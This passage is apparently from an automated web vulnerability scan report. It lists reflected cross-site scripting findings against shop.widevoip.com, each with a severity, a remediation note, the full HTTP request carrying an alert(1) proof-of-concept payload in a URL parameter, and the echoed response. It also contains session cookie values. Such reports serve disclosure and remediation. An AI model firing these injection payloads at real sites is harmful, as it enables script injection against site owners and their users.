Set-Cookie: kwd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: sit=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: cre=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: bpd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: apd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: scg=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: ppd=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Set-Cookie: afl=1_1305465399; Domain=.fetchback.com; Expires=Fri, 13-May-2016 13:16:39 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 15 May 2011 13:16:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing198d5<x style=x:expression(alert(1))>5b0a294aec3' *not* found -->

3.18. https://shop.widevoip.com/authentication.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /authentication.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dab5'-alert(1)-'2e2335fcaa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /authentication.php4dab5'-alert(1)-'2e2335fcaa6?back=order.php?step=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/prices-drop.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:30:46 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php4dab5'-alert(1)-'2e2335fcaa6?back=order.php?step=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.19. https://shop.widevoip.com/authentication.php [back parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /authentication.php

Issue detail

The value of the back request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96dac'-alert(1)-'4e13140a073 was submitted in the back parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /authentication.php?back=order.php?step=196dac'-alert(1)-'4e13140a073 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/prices-drop.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:01 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php?back=order.php?step=196dac'-alert(1)-'4e13140a073', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.20. https://shop.widevoip.com/authentication.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /authentication.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a809e'-alert(1)-'0dd4573b18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /authentication.php?back=order.php?step=1&a809e'-alert(1)-'0dd4573b18=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/prices-drop.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:58 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 18940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php?back=order.php?step=1&amp;a809e'-alert(1)-'0dd4573b18=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.21. https://shop.widevoip.com/cart.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /cart.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dbef'-alert(1)-'5b40c63d92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.php5dbef'-alert(1)-'5b40c63d92d?_=1305473189315&ajax=true&token=c2f1dad279e86a94006caa0cd37aee00 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:31:48 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/cart.php5dbef'-alert(1)-'5b40c63d92d?_=1305473189315&amp;ajax=true&amp;token=c2f1dad279e86a94006caa0cd37aee00', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.22. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f6d'-alert(1)-'bb10e0eb6e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imgf1f6d'-alert(1)-'bb10e0eb6e5/favicon.ico HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:28:48 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 15988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/imgf1f6d'-alert(1)-'bb10e0eb6e5/favicon.ico', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.23. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbfc3'-alert(1)-'69ac8c7469c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/favicon.icocbfc3'-alert(1)-'69ac8c7469c HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:29:34 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 15988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/img/favicon.icocbfc3'-alert(1)-'69ac8c7469c', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.24. https://shop.widevoip.com/index.php/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df848'-alert(1)-'1e48a97705d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.phpdf848'-alert(1)-'1e48a97705d/index.php HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:28:50 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3DoDcQmBCVnbQ%3DK%2Fi1Dx3NK0k%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DYuS%2Fvxk1%2FNQ%3D8MAFH3Yi5wI%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVRZUeHaR39U%3DPxm8lIuEK70%3Dnet3nHDNxhE%3DWekuOWehntk%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVRZUeHaR39U%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DVIIk4y0U0h4%3DCB2WkSYMNII%3D3IENIYtMMKw%3DFVlfiIV5H88%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.phpdf848'-alert(1)-'1e48a97705d/index.php', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.25. https://shop.widevoip.com/index.php/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d865'-alert(1)-'3fd3c2efa9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php/index.php8d865'-alert(1)-'3fd3c2efa9b HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:29:43 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3DNvRDSzqZp48%3DgjFFXMw%2B6QA%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DVqODQVHfB%2FM%3D7%2FPiSNLe4gw%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DJ9dL3Ft1qSU%3DPxm8lIuEK70%3Dt9Xo7atfG1w%3Dmb7KCTi%2F5Ms%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DJ9dL3Ft1qSU%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DVM0C%2BWb9gIo%3DgU1t2cjcXek%3DOWYTAk7KxGY%3DFVlfiIV5H88%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.php/index.php8d865'-alert(1)-'3fd3c2efa9b', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.26. https://shop.widevoip.com/index.php/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51537'-alert(1)-'10e189e9a5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php/index.php?51537'-alert(1)-'10e189e9a5f=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:47 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3DRs6HnuIgnFg%3DS%2FNnwasUD%2FY%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DHo2GXvwhbU0%3DdZjrcWH2pXE%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DCI6HEhjdnZ0%3DPxm8lIuEK70%3DU2AmFzAQleA%3Dve%2B0PNCi328%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DCI6HEhjdnZ0%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DsKU5%2B6HL9Nk%3DgU1t2cjcXek%3DL8kUdihCpYc%3D9eChPCHktLg%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta na
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.php/index.php?51537'-alert(1)-'10e189e9a5f=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.27. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da4c'-alert(1)-'03985f41b86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules5da4c'-alert(1)-'03985f41b86/blockcart/blockcart-set-collapse.php?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:31:15 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16042

